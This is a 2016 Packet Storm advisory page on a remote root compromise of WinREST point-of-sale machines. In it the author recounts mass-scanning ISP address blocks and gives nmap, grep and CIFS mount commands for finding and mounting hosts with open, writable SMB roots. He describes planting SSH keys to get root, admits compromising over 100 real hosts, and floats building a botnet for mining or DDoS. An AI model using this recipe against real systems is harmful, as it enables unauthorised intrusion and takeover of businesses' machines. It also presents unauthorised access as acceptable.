exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WinREST Remote Privilege Escalation

WinREST Remote Privilege Escalation
Posted Feb 12, 2016
Authored by Vitor Silva

WinREST point of sale machines suffer from a remote privilege escalation vulnerability.

tags | exploit, remote
SHA-256 | 4d27a4478ebe020f4d75fd9762c7f68bfa6613fd61fbcbd530618dab36c220f9

WinREST Remote Privilege Escalation

Change Mirror Download
So a year back I was massively scanning internet. This case ISPs IPs blocks where you can find easily at RIPE for example.
Then I found some interesting hosts where SMB were open and the ACL is totally open to root file system with the same netbios name.
All file system is writable.

I was able to find some software of WinREST https://www.grupopie.com/frontoffice.html so I was amazed how a system like this is totaly open.
So what I thought to do: Get root! how?
First mount smb file share then created RSA key. I created a directory under root folder of authorised keys, edited the file of dropbear to make sure ssh daemon will run and done.
Got root.
How big this is?
Well lets ask PIE group the company that makes this software…
I made some shell scripts to automatically find vulnerable hosts and inject all files necessarily.
First gather all subnets of ISPs then
# nmap -sV --open -p139 -n -oN allopenhosts –iL ISPRIPENCCblocks

Since we know WinREST is vulnerable by default we filter by hostname with
# grep 'WINREST\|PINGWIN’ allopenhosts -B3 | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}’

Now we got a file with all hosts running winrest.
Now run a script to read each line, mount with CIFS, and lets fun begin.
You know own some hosts. Let me show you all.
After you find some hosts

# mount -t cifs -o user=nobody,password=nobody //IP OMITTED/Root /mnt/hack/
Then just ls:

# ls /mnt/hack/
bin boot dev etc home images.scr lib lost+found mnt Photo proc root sbin sys tmp usr var


Lets just touch something:
/mnt/hack# touch omg ; ls
bin boot dev etc home images.scr lib lost+found mnt omg Photo proc root sbin sys tmp usr var


Omg. We can create files. Lets see root folder:
root@hostname:/mnt/hack# cd root/
root@hostname:/mnt/hack/root# ls
sq_bin sq_machines sq_modules sq_usr
root@hostname:/mnt/hack/root# touch OMG
root@hostname:/mnt/hack/root# ls
OMG sq_bin sq_machines sq_modules sq_usr


As I said now we own this. Easy generate RSA key with ssh-keygen and use it to authenticate as root.

root@hostname:~# ssh IP OMITTED
0 ~ # ls
OMG sq_bin* sq_machines* sq_modules* sq_usr*
0 ~ # uname -a
Linux ws1t1 2.6.39.4-pie #15 SMP Wed Apr 30 12:39:28 WEST 2014 i686 GNU/Linux
0 ~ # cat /proc/cpuinfo
processor : 0
vendor_id : CentaurHauls
cpu family : 6
model : 13
model name : VIA C7 Processor 1500MHz
stepping : 0
cpu MHz : 798.000
cache size : 128 KB
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 1
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge cmov pat clflush acpi mmx fxsr sse sse2 tm nx up pni est tm2 xtpr rng rng_en ace ace_en ace2 ace2_en phe phe_en pmm pmm_en
bogomips : 1596.00
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 32 bits virtual
power management:

Interesting part is you can build a botnet with this. It supports SSE SSE2 so probably you could code your own C code and run it like a daemon and you own a botnet.
For what? I don’t care.
Bitcoin mining maybe, DDoS whatever.


1 Year back I made this so automatically I gathered over 100 hosts.

My first security report to a seclist I hope I got some feedback.




--Vítor Silva
up201402657@fc.up.pt
Estudante | Student


FACULDADE DE CIÊNCIAS DA UNIVERSIDADE DO PORTO
Rua do Campo Alegre, s/n, 4169-007 Porto, Portugal
www.fc.up.pt <http://www.fc.up.pt/>







Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close